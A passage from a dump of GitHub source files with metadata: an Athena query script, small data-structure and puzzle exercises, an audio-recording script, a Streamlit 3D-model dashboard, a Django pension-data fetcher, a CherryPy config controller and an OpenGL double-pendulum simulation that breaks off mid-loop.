WorkGroup='data-analysis-wg'\n)\n\n# run select query\n\n\nquery = \"select * from 
social_media_db.socialmedia\"\n\nresponce = athene_client.start_query_execution(\n QueryString=query,\n WorkGroup='data-analysis-wg'\n)\n\n\nexecution_info = athene_client.get_query_execution(QueryExecutionId = responce['QueryExecutionId'])\n\n# get file location\n\npath= execution_info['QueryExecution']['ResultConfiguration']['OutputLocation']\n\nprint(path)\n\n# how we can use the path and read the file using boto3","repo_name":"amog4/Aws-Dataengineering","sub_path":"Athena/athena.py","file_name":"athena.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9835408329","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\ndef print_Ith(head,c,i):\r\n while head != None and c <= i:\r\n if c == i:\r\n print(head.data)\r\n c+=1\r\n head = head.next\r\n return\r\n\r\ndef takeInput():\r\n inputList = [int(ele) for ele in input().split()]\r\n head = None\r\n tail = None\r\n for currData in inputList:\r\n if currData == -1:\r\n break\r\n newNode = Node(currData)\r\n\r\n if head == None:\r\n head = newNode\r\n tail = newNode\r\n else:\r\n tail.next = newNode\r\n tail = newNode\r\n\r\n return head\r\n\r\nhead = takeInput()\r\ni = int(input('enter i:'))\r\nprint_Ith(head,0,i)","repo_name":"Jashwanth-k/Data-Structures-and-Algorithms","sub_path":"4.Linked Lists/print Ith node.py","file_name":"print Ith node.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"44623120412","text":"from os import error\n\n\ndef read_input(file_name):\n with open(file_name, \"r\") as f:\n data = f.read()\n data = data.split(\"\\n\")\n return data\n\n\ndef get_pairs():\n return {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"<\": \">\"}\n\n\ndef get_error_score(c):\n if c == \")\":\n return 3\n elif c == \"]\":\n return 57\n elif c == \"}\":\n return 1197\n elif c == \">\":\n return 25137\n\n\ndef process(lines):\n corrupt = 0\n error_score = 0\n for line in lines:\n stack = []\n for c in line:\n if c in get_pairs().keys():\n stack.append(c)\n elif c in get_pairs().values():\n if len(stack) == 0:\n corrupt += 1\n error_score += get_error_score(c)\n break\n last = stack.pop()\n if get_pairs()[last] != c:\n corrupt += 1\n error_score += get_error_score(c)\n break\n return error_score\n\n\nlines = read_input(\"input.txt\")\ncorrupt_lines = process(lines)\nprint(corrupt_lines)\n","repo_name":"kevindong/aoc2021","sub_path":"day10/day10p1.py","file_name":"day10p1.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14905802714","text":"import re\nimport numpy as np\nimport sounddevice as sd\nimport soundfile as sf\nimport time\nimport queue\nimport os, shutil\nfrom underthesea import sent_tokenize\n\nq = queue.Queue()\ncategory = ['thoi_su', 'goc_nhin', 'the_gioi', 'kinh_doanh', 'giai_tri', 'the_thao', 'phap_luat', 'giao_duc', 'suc_khoe', 'doi_song',\n 'du_lich', 'khoa_hoc', 'so_hoa', 'xe', 'y_kien', 'tam_su']\n\nrecordingCat = category[12]\npathToData = 'data/' + recordingCat + '/'\n\nfolder = pathToData\n# for filename in os.listdir(folder):\n# file_path = os.path.join(folder, filename)\n# try:\n# if os.path.isfile(file_path) or os.path.islink(file_path):\n# os.unlink(file_path)\n# elif os.path.isdir(file_path):\n# shutil.rmtree(file_path)\n# except Exception as e:\n# print('Failed 
to delete %s. Reason: %s' % (file_path, e))\n\ndef callback(indata, frames, time, status):\n \"\"\"This is called (from a separate thread) for each audio block.\"\"\"\n if status:\n print(status)\n q.put(indata.copy())\n\nwith open('article/' + recordingCat + '.txt', 'r', encoding='utf-8') as f:\n # To not to read the url in the first line\n f.readline()\n text = f.read()\n\nsentences = sent_tokenize(text)\n# text = re.sub('[\\n]+', ' ', text)\n# sentences = re.split(r' *[\\.\\?!][\\'\"\\)\\]]* *', text)\n\ni = 16\nfor sentence in sentences[16:]:\n print(str(i) + '\\t' + sentence)\n input('Press Enter to start recording...')\n try:\n fileName = pathToData + recordingCat + '_' + str(i) + '.wav'\n if os.path.exists(pathToData + fileName):\n os.remove(pathToData + fileName)\n file = sf.SoundFile(fileName, mode='x', samplerate=44100, channels=2)\n with sd.InputStream(samplerate=44100, channels=2, callback=callback):\n print('press Ctrl+C to stop the recording')\n while True:\n file.write(q.get())\n except KeyboardInterrupt:\n print('Recording finished: ' + repr(fileName))\n i+=1\n","repo_name":"VietAnhLe2399/SpeechProcessing","sub_path":"project01/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70908867732","text":"import os\nimport shutil\nfrom distutils.dir_util import copy_tree\n\n\"\"\"\nscript.py by Chapardev\nThis program moves web game files (that you can find on this current directory if you use the makefile) to Downloads directory.\nAfter that it copies desktop game directories (../assets and ../bin) to Downloads directory.\n\"\"\"\n\ndef move_file_to_downloads(file_name):\n current_path = os.path.join(\"src\", file_name)\n print(f\"Moving {file_name}\")\n dest_path = os.path.join(\"C:\\\\Users\\\\rando\\\\Downloads\", file_name)\n shutil.move(current_path, dest_path)\n\ndef main():\n EXECUTABLE_NAME = \"Sokobus\"\n\n if os.path.exists(os.path.join(\"src\", f\"{EXECUTABLE_NAME}.html\")):\n os.rename(os.path.join(\"src\", f\"{EXECUTABLE_NAME}.html\"), os.path.join(\"src\", \"index.html\"))\n move_file_to_downloads(\"index.html\")\n move_file_to_downloads(f\"{EXECUTABLE_NAME}.data\")\n move_file_to_downloads(f\"{EXECUTABLE_NAME}.js\")\n move_file_to_downloads(f\"{EXECUTABLE_NAME}.wasm\")\n \n copy_tree(\"assets\", \"C:\\\\Users\\\\rando\\\\Downloads\\\\assets\")\n print(\"Copied assets directory\")\n copy_tree(\"bin\", \"C:\\\\Users\\\\rando\\\\Downloads\\\\bin\")\n print(\"Copied bin directory\")\n \n input(\"Press enter to quit...\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"Limulos/Sokobus","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2629274862","text":"import streamlit as st\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom depth2cloud import *\nfrom PIL import Image\nfrom utils_dashboard import *\n\ndef save_uploaded_file(uploaded_file, save_path='static/images'):\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n try:\n save_file_path = os.path.join(save_path,uploaded_file.name)\n with open(os.path.join(save_path,uploaded_file.name),'wb') as f:\n f.write(uploaded_file.getbuffer())\n return save_file_path \n except:\n return None\n\nsave_path = 'static/images'\ndepth_save_dir = \"depth_output\"\nsegmentation_model_path = 
\"./segmentation_model/pointrend_resnet50.pkl\"\ndepth_model_base_path = './midas_depth/weights/'\ncam_mat_save_path = os.path.join('cam_matrix/cameraIntrinsic_apple.xml')\ncloud_save_dir = \"./point_clouds\"\n\nst.title('DDP-1: 2D to 3D converter')\n\ndef handle_submit():\n st.session_state.submit = True\n\ndef handle_upload():\n if 'upl_names' not in st.session_state:\n st.session_state.upl_names = [st.session_state.upl]\n else:\n st.session_state.upl_names.append(st.session_state.upl)\n\n# page = st.sidebar.selectbox('Page Navigation', [\"3D model estimation\", \"Under the hood\"])\n\n# st.sidebar.markdown(\"\"\"---\"\"\")\nst.sidebar.write(\"Created by [RA Keerthan](https://github.com/keerthan2)\")\nst.sidebar.image(\"static/logo.png\", width=100)\n\nst.markdown(\"Select input RGB Image\")\nupload_columns = st.columns([2, 1])\nfile_upload = upload_columns[0].expander(label=\"Upload a RGB image\")\nuploaded_file = file_upload.file_uploader(\"Choose a RGB image\", type=['jpg','png','jpeg'], key='upl', on_change=handle_upload)\n\nif uploaded_file is not None:\n save_file_path = save_uploaded_file(uploaded_file)\n if save_file_path is not None: \n display_image = Image.open(uploaded_file)\n st.info(\"This image appears to be valid :ballot_box_with_check:\")\n upload_columns[1].image(display_image)\n submit_button = upload_columns[1].button(\"Run 3D model generation\", on_click = handle_submit)\n st.markdown(\"\"\"---\"\"\")\n else:\n st.error(\"This image appears to be invalid :no_entry_sign:\")\n\nif ('upl_names' in st.session_state) and (len(st.session_state.upl_names) > 1):\n if st.session_state.upl_names[-1]!=None and st.session_state.upl_names[-2]!=None:\n output = st.empty()\n with st_capture(output.code):\n print('1.1.1',st.session_state['upl_names'])\n if st.session_state.upl_names[-1].id == st.session_state.upl_names[-2].id:\n with st.spinner(text=\"Fetching the 3D model...\"):\n img_path = save_file_path\n depth_calibration_pipeline = predict(img_path, depth_save_dir,\n segmentation_model_path = segmentation_model_path, \n depth_model_base_path = depth_model_base_path,\n cam_mat_save_path = cam_mat_save_path,\n cloud_save_dir = cloud_save_dir)\n pcd_file_name = f\"{st.session_state.upl_names[-1].name.split('.')[0]}.ply\"\n pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n with open(pcd_path, 'rb') as f:\n st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\n else:\n st.session_state.upl_names = [st.session_state.upl_names[-1]]\n # except:\n # output = st.empty()\n # with st_capture(output.code):\n # print('1.1.2',st.session_state['upl_names'])\n # st.session_state.upl_names = [st.session_state.upl_names[-1]]\n else:\n st.session_state.upl_names = st.session_state.upl_names[1:]\n if 'submit' in st.session_state:\n output = st.empty()\n with st_capture(output.code):\n print('1.2',st.session_state['upl_names'])\n with st.spinner(text=\"Fetching the 3D model...\"):\n img_path = save_file_path\n depth_calibration_pipeline = predict(img_path, depth_save_dir,\n segmentation_model_path = segmentation_model_path, \n depth_model_base_path = depth_model_base_path,\n cam_mat_save_path = cam_mat_save_path,\n cloud_save_dir = cloud_save_dir)\n pcd_file_name = f\"{st.session_state.upl_names[-1].name.split('.')[0]}.ply\"\n pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n with open(pcd_path, 'rb') as f:\n st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\nelse:\n if 'submit' in st.session_state:\n output = st.empty()\n 
with st_capture(output.code):\n print('2',st.session_state['upl_names'])\n with st.spinner(text=\"Fetching the 3D model...\"):\n img_path = save_file_path\n depth_calibration_pipeline = predict(img_path, depth_save_dir,\n segmentation_model_path = segmentation_model_path, \n depth_model_base_path = depth_model_base_path,\n cam_mat_save_path = cam_mat_save_path,\n cloud_save_dir = cloud_save_dir)\n pcd_file_name = f\"{uploaded_file.name.split('.')[0]}.ply\"\n pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n with open(pcd_path, 'rb') as f:\n st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\nif 'submit' in st.session_state:\n output = st.empty()\n with st_capture(output.code):\n print('3',st.session_state['upl_names'])\n# if 'submit' in st.session_state:\n# with st.spinner(text=\"Fetching the 3D model...\"):\n# img_path = save_file_path\n# depth_calibration_pipeline = predict(img_path, depth_save_dir,\n# segmentation_model_path = segmentation_model_path, \n# depth_model_base_path = depth_model_base_path,\n# cam_mat_save_path = cam_mat_save_path,\n# cloud_save_dir = cloud_save_dir)\n# pcd_file_name = f\"{uploaded_file.name.split('.')[0]}.ply\"\n# pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n# with open(pcd_path, 'rb') as f:\n# st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\n\n","repo_name":"keerthan2/Virtual_Volume_Estimation","sub_path":"dashboard_test.py","file_name":"dashboard_test.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39588481514","text":"def hola(nombre=\"Mundo\"):\n print(\"Hola\",nombre)\n\nhola(\"Cookie\")\nhola()\n\nclass animal:\n def __init__(self, patas=4, tipo=\"pequeño\"):\n self.patas=patas\n self.tipo=tipo\nclass perro(animal):\n def __init__(self, nombre = \"Oddie\", raza = \"Jack\"):\n self.nombre = nombre\n self.raza = raza\n #referencia a clase padre\n# def saludo(self):\n# return \"Te saluda %s\" % self.nombre\n\nperrito = perro(nombre=\"Lucas\", raza=\"jack\")\nperrito_hanz = perro()\nprint(perrito.nombre)\nprint(perrito.raza)\n#print(perrito.tipo)\n#print(perrito.patas)\n#perrito.saludo\nprint(perrito_hanz.nombre)\nprint(perrito_hanz.raza)\n#perrito_hanz.saludo","repo_name":"cmgcookie/scripts","sub_path":"ejercicios/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43968159353","text":"import alt_path\nfrom header import *\n\nclass Host_config:\n\n def __init__(self, root):\n\n self.root = root\n\n self.task = Task(root)\n self.msgs = Msgs(root)\n self.resources = Resources(root)\n\nclass Task:\n\n def __init__(self, root):\n\n self.root = root\n\n @cherrypy.expose\n def list(self):\n\n db = cherrypy.thread_data.db\n tasks = db.sql(\"select * from tasks t where t.status!='DELETED' order by t.project, t.name\")\n\n return self.root.render('host/config/task/list', tasks=tasks)\n\n @cherrypy.expose\n def edit(self, task_id, _form=None, type=None):\n\n db = cherrypy.thread_data.db\n error = None\n\n if cherrypy.request.method=='POST':\n self.root.auth('admin')\n _form = www.form.prepare_form(_form)\n if task_id=='new':\n if db.sql(\"select * from tasks where name=%s and status!='DELETED'\", _form.name):\n error = 'Task name exists'\n if not _form.name:\n error = 'Empty name'\n if not _form.project:\n error = 'Empty project'\n if not 
error:\n task = dict_(\n type = _form.type.upper(),\n name = _form.name,\n project = _form.project,\n priority = int(_form.priority),\n n_fatals = int(_form.n_fatals)\n )\n if task.type=='PERIODIC':\n task.period = int(_form.period)\n if task.type=='EVENT':\n task.n_runs = int(_form.n_runs)\n if task_id=='new':\n cmd = 'NEW_TASK'\n else:\n cmd = 'EDIT_TASK'\n task.task_id = task_id\n self.root.host.cmd_save(cmd, task)\n url = self.root.cfg.root_url + '/host/config/task/list/'\n raise cherrypy.HTTPRedirect(url)\n\n if cherrypy.request.method=='GET' or error:\n if task_id!='new':\n task = db.sql(\"select * from tasks where task_id=%s\", task_id)[0]\n else:\n task = dict_(type=type)\n if not error:\n _form = task\n return self.root.render('host/config/task/edit_' + task.type.lower(), _form=_form,\n error=error, task_id=task_id, task=task, type=type)\n\nclass Msgs:\n\n def __init__(self, root):\n\n self.root = root\n\n @cherrypy.expose\n def edit(self, _form=None):\n\n db = cherrypy.thread_data.db\n error = None\n if cherrypy.request.method=='POST':\n self.root.auth('admin')\n _form = www.form.prepare_form(_form)\n for i, line in enumerate(_form.text.split('\\n')):\n if not line.strip():\n continue\n m = re.match('([+-] *(.+?) *(.+?) *\\\"(.+?)\\\" *(.*))', line)\n if not m:\n error = 'Wrong format in line %s' % (i+1)\n if not error:\n self.root.host.cmd('SET_CFG_MSG', dict_(text=_form.text))\n raise cherrypy.HTTPRedirect('/config/msgs/')\n\n if cherrypy.request.method=='GET' or error:\n if not error:\n sql = \"select value from values where name='cfg_msgs'\"\n text = db.sql(sql)[0].value\n _form = dict_(text=text)\n return self.root.render('/host/config/msgs/edit', _form=_form,\n error=error)\n\nclass Resources:\n\n def __init__(self, root):\n\n self.root = root\n\n @cherrypy.expose\n def edit(self, _form=None):\n\n db = cherrypy.thread_data.db\n error = None\n if cherrypy.request.method=='POST':\n self.root.auth('admin')\n _form = www.form.prepare_form(_form)\n try:\n resources = json.loads(_form.text)\n except:\n error = 'Bad json'\n if not error:\n print(resources)\n self.root.host.cmd_save('SET_HOST_RESOURCES', dict_(text=_form.text))\n raise cherrypy.HTTPRedirect('')\n\n if cherrypy.request.method=='GET' or error:\n if not error:\n sql = \"select value from values where name='cfg_resources'\"\n text = db.sql(sql, return_one=True).value\n _form = dict_(text=text)\n return self.root.render('/host/config/resources/edit', _form=_form,\n error=error)\n\n","repo_name":"altyntsev/alt_proc","sub_path":"2018-10-23-alt_proc_control/main/host_config.py","file_name":"host_config.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41048812638","text":"class DiffOENode:\r\n def __init__(self, data):\r\n self.data = data\r\n self.left = None\r\n self.right = None\r\n\r\n\r\ndef dif(roo):\r\n if roo is None:\r\n return 0\r\n\r\n a = [roo]\r\n odele = 0\r\n evie = 0\r\n level = 0\r\n\r\n while len(a):\r\n s = len(a)\r\n level += 1\r\n while s > 0:\r\n current = a[0]\r\n a.pop(0)\r\n if level % 2 == 0:\r\n evie += current.data\r\n else:\r\n odele += current.data\r\n\r\n if current.left:\r\n a.append(current.left)\r\n if current.right:\r\n a.append(current.right)\r\n s -= 1\r\n return odele - evie\r\n\r\n\r\nroot = DiffOENode(1)\r\nroot.left = DiffOENode(2)\r\nroot.right = DiffOENode(3)\r\nroot.left.left = DiffOENode(4)\r\nroot.right.left = DiffOENode(5)\r\nroot.right.right = 
DiffOENode(6)\r\nprint(dif(root))\r\n","repo_name":"sathya0803/MyPythonCode","sub_path":"Tr3.py","file_name":"Tr3.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40000393140","text":"from django.conf import settings \n\nimport os\nimport csv\nimport requests\nfrom xml.etree import ElementTree as elemTree\nfrom difflib import SequenceMatcher\nfrom datetime import datetime\n\nfrom .models import PensionCompany\n\nfrom .dump import DUMP\n\nDOWNLOAD_FILENAME = 'pension_company.csv'\nAPI_DEV_MODE = settings.API_DEV_MODE\nAPI_URL = 'http://apis.data.go.kr/B552015/NpsBplcInfoInqireService/getBassInfoSearch'\nMAX_RESULT_SIZE = 100000\n\ndef similar(a: str, b: str):\n return SequenceMatcher(None, a, b).ratio()\n\n\ndef get_openapi_result(registration_number: str, keyword: str):\n params = {\n 'serviceKey': settings.SERVICE_KEY,\n 'wkpl_nm': keyword,\n 'bzowr_rgst_no': str(registration_number),\n 'numOfRows': MAX_RESULT_SIZE,\n }\n\n response = requests.get(API_URL, params=params)\n \n return response.text\n\n\ndef parse_openapi_result(text: str):\n items = elemTree.fromstring(text).find('body').find('items')\n \n result = []\n for item in items.iter('item'):\n dic = {}\n dic['name'] = item.find('wkplNm').text\n dic['registration_number'] = item.find('bzowrRgstNo').text\n dic['address'] = item.find('wkplRoadNmDtlAddr').text\n dic['created_at'] = item.find('dataCrtYm').text\n dic['seq'] = item.find('seq').text\n\n result.append([*dic.items()])\n\n return result\n\ndef parse_registration_number(registration_number: str):\n return registration_number.replace('-', '')\n\ndef parse_registration_name(registration_name: str):\n return registration_name.replace('주식회사', '').replace('(주)', '')\n\ndef get_similar_company_list_by_registration(registration_name: str, registration_number: str, keyword):\n registration_name = registration_name.strip()\n registration_number = registration_number.strip()\n keyword = (keyword or \"\").strip()\n\n registration_number = parse_registration_number(registration_number)\n result = DUMP if API_DEV_MODE else parse_openapi_result(get_openapi_result(registration_number[:6], keyword)) \n result.sort(key = lambda t: (-similar(t[0][1], registration_name), -int(t[4][1])))\n \n return result\n\ndef get_similar_company_list_by_registration_from_pension_company(registration_name: str, registration_number: str, keyword):\n registration_name = registration_name.strip()\n registration_number = registration_number.strip()\n keyword = (keyword or \"\").strip()\n \n registration_number = parse_registration_number(registration_number)[:6]\n \n result = [*PensionCompany.objects.filter(registration_number = registration_number).values(\n 'name',\n 'registration_number',\n 'lot_number_address',\n 'road_name_address',\n 'employees_count',\n 'data_created_at',\n )]\n \n result.sort(key = lambda t: (-similar(t['name'], registration_name), -datetime(int(t['data_created_at'][:4]), int(t['data_created_at'][5:]), 1).timestamp()))\n\n result = [item.items() for item in result]\n\n return result\n\ndef download_company_csv():\n print(\"File Download Start!\")\n \n try:\n with open(DOWNLOAD_FILENAME, 'wb') as file:\n response = requests.get(\"https://www.data.go.kr/catalog/15083277/fileData.json\")\n csv_url = response.json()['distribution'][0]['contentUrl']\n \n print(f\"{csv_url}에서 다운받고 있습니다.\")\n\n response = requests.get(csv_url)\n file.write(response.content)\n except Exception as err:\n 
print(\"File Download Error\", err)\n return False\n\n print(\"File Download Complete!\") \n return True\n\n\n# ['자료생성년월', ' 사업장명', ' 사업자등록번호', ' 사업장가입상태코드 1 등록 2 탈퇴', ' 우편번호', ' 사업장지번상세주소', ' 사업장도로명상세주소', ' 고객법정동주소코드', ' 고객행정동주소코드', ' 법정동주소광역시도코드', ' 법정동주소광역시시군구코드', ' 법정동주소광역시시군구읍면동코드', ' 사업장형태구분코드 1 법인 2 개인', ' 사업장업종코드', ' 사업장업종코드명', ' 적용일자', ' 재등록일자', ' 탈퇴일자', ' 가입자수', ' 당월고지금액', ' 신규취득자수', ' 상실가입자수']\ndef update_pension_company():\n with open(DOWNLOAD_FILENAME, 'r', encoding='cp949') as file:\n csv_file = csv.reader(file)\n \n bulk_pension_companies = []\n \n print(\"Pension Company Data Reload Start!\")\n \n for idx, row in enumerate(csv_file):\n if idx == 0:\n continue\n\n pension_company = PensionCompany(\n name = row[1],\n registration_number = row[2],\n lot_number_address = row[5],\n road_name_address = row[6],\n employees_count = row[18],\n data_created_at = row[0],\n )\n \n bulk_pension_companies.append(pension_company)\n \n PensionCompany.objects.all().delete()\n PensionCompany.objects.bulk_create(bulk_pension_companies, 400)\n\n print(\"Pension Company Data Reload Complete!\")\n\n\ndef delete_csv_file():\n os.remove(DOWNLOAD_FILENAME)\n\n\ndef reload_pension_company():\n if download_company_csv():\n update_pension_company()\n delete_csv_file()\n","repo_name":"shinkeonkim/paeon","sub_path":"main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2823016727","text":"import numpy as np\nimport glfw\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom random import random\n\ndef render(th1, th2, camAng):\n\n\tglPolygonMode( GL_FRONT_AND_BACK, GL_LINE )\n# enable depth test\n\tglClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\tglEnable(GL_DEPTH_TEST)\n\tglLoadIdentity()\n\n# orthogonal projection\n\tglOrtho(-1, 1, -1, 1, -3, 3)\n# rotate camera position\n\tgluLookAt(.2*np.sin(camAng), .1,.2*np.cos(camAng), 0, 0, 0, 0, 1, 0)\n\n# draw cooridnate\n\tglBegin(GL_LINES)\n\tglColor3ub(255, 0, 0)\n\tglVertex3fv(np.array([0.,0.,0.]))\n\tglVertex3fv(np.array([1.,0.,0.]))\n\tglColor3ub(0, 255, 0)\n\tglVertex3fv(np.array([0.,0.,0.]))\n\tglVertex3fv(np.array([0.,1.,0.]))\n\tglColor3ub(0, 0, 255)\n\t# aligning with pendulum path\n\tglVertex3fv(np.array([0.,0.,0.]))\n\tglVertex3fv(np.array([-1.,0.,0.]))\n\tglEnd()\n\n\n\n\n\t# start drawing pendulum\n\t\n\t#-------\n\t# LAYER1\n\tglPushMatrix()\n\n\t#-------\n\t# LAYER2\n\tglPushMatrix()\n\n\tglColor3ub(255, 0, 0)\n\tglScalef(.05, .05, .05)\n\tglColor3ub(255, 0, 0)\n\n\t# first ball\n\tdrawSphere()\n\tglPopMatrix()\n\tglTranslatef(0.3*np.sin(th1), -0.3*np.cos(th1), 0)\n\n\t#-------\n\t# LAYER2\n\tglPushMatrix()\n\tglTranslatef(0.3*np.sin(th1), -0.3*np.cos(th1), 0)\n\n\t#-------\n\t# LAYER3\n\tglPushMatrix()\n\tglScalef(.05, .05, .05)\n\tglColor3ub(255, 0, 0)\n\t# second ball\n\tdrawSphere()\n\tglPopMatrix()\n\n\t\n\tglTranslatef(0.3*np.sin(th1+th2), -0.3*np.cos(th1+th2), 0)\n\n\t#-------\n\t# LAYER3\n\tglPushMatrix()\n\tglTranslatef(0.3*np.sin(th1+th2), -0.3*np.cos(th1+th2), 0)\n\tglScalef(.05, .05, .05)\n\tglColor3ub(255, 0, 0)\n\t# third ball\n\tdrawSphere()\n\tglPopMatrix()\n\n\tglRotatef(((th2+th1)*180/np.pi) % 360, 0, 0, 1)\n\tglColor3ub(0, 255, 0)\n\t# green cube\n\tglScalef(0.2, 2, 0.2)\n\tdrawCube()\n\n\tglPopMatrix()\n\n\n\tglRotatef((th1*180/np.pi) % 360, 0, 0, 1)\n\tglColor3ub(0, 0, 255)\n\t# blue cube\n\tglScalef(0.2, 2, 0.2)\n\tdrawCube()\n\n\tglPopMatrix()\n\n\n\n\n# numerically compuing 
double pendulum with Runge-Kutta method\ndef runge_kutta(yin, h):\n\tyout = [0]*4\n\tyt = [0]*4\n\tk = np.zeros((4, 4))\n\n\n\tdydx = derivatives(yin)\n\tfor i in range(4):\n\t\tk[0][i] = h*dydx[i]\n\t\tyt[i] = yin[i] + 0.5*k[0][i]\n\n\n\tdydx = derivatives(yt)\n\tfor i in range(4):\n\t\tk[1][i] = h*dydx[i]\n\t\tyt[i] = yin[i] + 0.5*k[1][i]\n\n\n\tdydx = derivatives(yt)\n\tfor i in range(4):\n\t\tk[2][i] = h*dydx[i]\n\t\tyt[i] = yin[i] + k[2][i]\n\n\tdydx = derivatives(yt)\n\tfor i in range(4):\n\t\tk[3][i] = h*dydx[i]\n\t\tyout[i] = yin[i] + k[0][i]/6. + k[1][i]/3. + k[2][i]/3. + k[3][i]/6.\n\n\treturn yout\n\n\ndef derivatives(yin):\n\t# masses and lengths of the pendulum, gravity constant\n\tM1 = 1.2\n\tM2 = 1.0\n\tL1 = 1.0\n\tL2 = 1.0\n\tG = 9.8\n\t\n\tdydx = [0]*4\n\tdydx[0] = yin[1]\n\n\tdel_ = yin[2]-yin[0]\n\tden1 = (M1+M2)*L1 - M2*L1*np.cos(del_)*np.cos(del_);\n\tdydx[1] = (M2*L1*yin[1]*yin[1]*np.sin(del_)*np.cos(del_)\n \t\t+ M2*G*np.sin(yin[2])*np.cos(del_) + M2*L2*yin[3]*yin[3]*np.sin(del_)\n \t\t- (M1+M2)*G*np.sin(yin[0]))/den1\t\n\t\n\tdydx[2] = yin[3]\n\n\tden2 = (L2/L1)*den1\n\tdydx[3] = (-M2*L2*yin[3]*yin[3]*np.sin(del_)*np.cos(del_)\n \t\t+ (M1+M2)*G*np.sin(yin[0])*np.cos(del_) \n \t\t- (M1+M2)*L1*yin[1]*yin[1]*np.sin(del_)\n \t\t- (M1+M2)*G*np.sin(yin[2]))/den2\n\n\treturn dydx\n\n\ndef drawCube():\n\tglBegin(GL_QUADS)\n\tglVertex3f( 0.1, 0.1,-0.1)\n\tglVertex3f(-0.1, 0.1,-0.1)\n\tglVertex3f(-0.1, 0.1, 0.1)\n\tglVertex3f( 0.1, 0.1, 0.1)\n\tglVertex3f( 0.1,-0.1, 0.1)\n\tglVertex3f(-0.1,-0.1, 0.1)\n\tglVertex3f(-0.1,-0.1,-0.1)\n\tglVertex3f( 0.1,-0.1,-0.1)\n\tglVertex3f( 0.1, 0.1, 0.1)\n\tglVertex3f(-0.1, 0.1, 0.1)\n\tglVertex3f(-0.1,-0.1, 0.1)\n\tglVertex3f( 0.1,-0.1, 0.1)\n\tglVertex3f( 0.1,-0.1,-0.1)\n\tglVertex3f(-0.1,-0.1,-0.1)\n\tglVertex3f(-0.1, 0.1,-0.1)\n\tglVertex3f( 0.1, 0.1,-0.1)\n\tglVertex3f(-0.1, 0.1, 0.1)\n\tglVertex3f(-0.1, 0.1,-0.1)\n\tglVertex3f(-0.1,-0.1,-0.1)\n\tglVertex3f(-0.1,-0.1, 0.1)\n\tglVertex3f( 0.1, 0.1,-0.1)\n\tglVertex3f( 0.1, 0.1, 0.1)\n\tglVertex3f( 0.1,-0.1, 0.1)\n\tglVertex3f( 0.1,-0.1,-0.1)\n\tglEnd()\n\n\n# draw a sphere of radius 1, centered at the origin.\n# numLats: number of latitude segments (horizontal)\n# numLongs: number of longitude segments (horizontal)\ndef drawSphere(numLats=12, numLongs=12):\n\tfor i in range(0, numLats + 1):\n\t\tlat0 = np.pi * (-0.5 + float(float(i - 1) / float(numLats)))\n\t\tz0 = np.sin(lat0)\n\t\tzr0 = np.cos(lat0)\n\t\tlat1 = np.pi * (-0.5 + float(float(i) / float(numLats)))\n\t\tz1 = np.sin(lat1)\n\t\tzr1 = np.cos(lat1)\n\t\t# Use Quad strips to draw the sphere\n\t\tglBegin(GL_QUAD_STRIP)\n\t\tfor j in range(0, numLongs + 1):\n\t\t\tlng = 2 * np.pi * float(float(j - 1) / float(numLongs))\n\t\t\tx = np.cos(lng)\n\t\t\ty = np.sin(lng)\n\t\t\tglVertex3f(x * zr0, y * zr0, z0)\n\t\t\tglVertex3f(x * zr1, y * zr1, z1)\n\t\tglEnd()\n\n\ndef key_callback(window, key, scancode, action, mods):\n\tglobal camAng\n\tif action==glfw.PRESS or action==glfw.REPEAT:\n\t\tif key==glfw.KEY_3:\n\t\t\tcamAng += np.radians(5)\n\t\tif key==glfw.KEY_1:\n\t\t\tcamAng -= np.radians(5)\n\n\n\ndef main():\n\tglobal camAng\n\n\tif not glfw.init():\n\t\treturn\n\twindow = glfw.create_window(700,700,\"2014001303\", None,None)\n\tglfw.set_key_callback(window, key_callback)\n\tif not window:\n\t\tglfw.terminate()\n\t\treturn\n\tglfw.make_context_current(window)\n\n\tcamAng = 0\n\n\t# randomly generates location of the pendulum\n\tth1 = np.pi * random()\n\tth2 = np.pi * random()\n\tw1 = 0\n\tw2 = 0\n\twhile not 
